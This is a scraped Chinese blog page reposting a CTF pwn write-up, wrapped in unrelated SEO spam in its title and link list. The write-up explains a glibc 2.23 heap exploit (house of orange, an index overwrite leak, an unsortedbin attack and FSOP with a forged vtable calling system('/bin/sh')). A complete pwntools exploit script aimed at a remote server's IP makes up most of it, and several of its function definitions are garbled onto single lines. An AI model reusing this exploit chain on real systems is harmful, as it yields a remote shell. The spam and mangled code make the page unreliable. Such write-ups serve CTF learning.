当前位置: 首页 > news >正文

网站内容采编怎么做企业网络营销业务

网站内容采编怎么做,企业网络营销业务,楚雄市网站建设公司,政府类网站建设 经费很经典的house of orange unsortedbin attack FSOP 变量覆盖 不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。 但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢? …

很经典的house of orange + unsortedbin attack +FSOP+ 变量覆盖

不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。

 

但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢?

 

我们注意到这是>,但下标一般是从0开始,所以可能会有变量覆盖,我们看看。

 

果然,第33个chunk的size会覆盖第0个chunk地址的最后一字节,所以我们只需要调试一下,就可以通过show(0)泄露堆地址,其他没什么难度,以下是wp:

from pwn import *
context.arch='amd64'
#io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
#libc=elf.libc
io=remote('110.40.35.73',33774)def debug():gdb.attach(io)pause()def inter():io.interactive()def add(size,content):io.recvuntil(b">\n")io.sendline(b'1')io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def edit(idx,size,content):io.recvuntil(b">\n")io.sendline(b'2')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def show(idx):io.recvuntil(b">\n")io.sendline(b'3')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())def delete():io.recvuntil(b"please input:\n")io.sendline(b'2')add(0x30,b'aa')#0
#debug()
edit(0,0x40,b'a'*0x38+p64(0xfc1))
add(0x1000,b'aa')#1
#debug()
add(0x10,b'\x78')#2
show(2)
libc_base=u64(io.recv(8))-0x3c4178
print('libc_base:',hex(libc_base))
#debug()
for i in range(29):add(0x1000,b'aa')
add(0x80,b'\x60')#32
#debug()
show(0)
heap=u64(io.recv(8))-0x60
chunk=heap+0xf0
print('heap:',hex(heap))
system=libc_base+libc.sym['system']
pl=b'a'*(0x10+0x90)
#debug()
vtable=chunk+0xe0
print('vtable:',hex(vtable))
iolist=libc_base+libc.sym['_IO_list_all']
payload=b'/bin/sh\x00'+p64(0x61)+p64(0)+p64(iolist-0x10)
payload+=p64(0)+p64(1)
payload=payload.ljust(0xd8,b'\x00')
payload+=p64(vtable)
payload+=p64(0)*3+p64(system)
print(len(payload))
edit(2,0x300,pl+payload)
#debug()
io.recvuntil(b">\n")
io.sendline(b'0'*0x400+b'1')
io.interactive()

 

http://www.yidumall.com/news/10599.html

相关文章:

  • 济南市莱芜区人民政府百度seo新算法
  • 黃冈建设厅官方网站娄底地seo
  • wordpress能否做网站站长之家权重
  • wordpress文本悬停变色免费seo在线工具
  • 如何建立国际网站衡阳seo
  • 国家拨款农村建设查询的网站南宁seo网络优化公司
  • 做悬浮导航的网站百度快照客服电话
  • wordpress电影站数据下载什么优化
  • 广州市增城区建设局网站是什么南宁网站优化
  • 重庆网站建站建设平台短视频seo厂家
  • 做毕业设计资料网站好域名注册
  • 永久免费手机网站自助建站百度蜘蛛池自动收录seo
  • 品牌网站策划方案百度手机助手免费下载
  • 长春怎么做网站广州网站优化公司排名
  • 网站开发的技术支持重庆网站建设哪家好
  • 北京住房城乡建设部网站八大员广州专业网络推广公司
  • 福州网站建设印秀凡科官网免费制作小程序
  • 县政府网站建设方案阿拉善盟seo
  • 微信小程序外联网站网络销售平台有哪些软件
  • 做蓝牙音箱在什么网站上找客户百度网站统计
  • 婚庆网站开发背景兰州网站seo
  • 专业网站建设组织torrentkitty磁力官网
  • 淘宝网店的seo主要是怎么制作seo搜索优化
  • 网站企业推广方案如何自己做网页
  • 辽宁省城乡和住房建设厅网站什么是口碑营销
  • 宁夏公司网站seo是怎么优化推广的
  • 网站建设 贸易小广告公司如何起步
  • 网站建设华网天下制作作深圳网络推广哪家比较好
  • 私服网站建设常州网站建设书生商友
  • 做网站的开发心得写软文用什么软件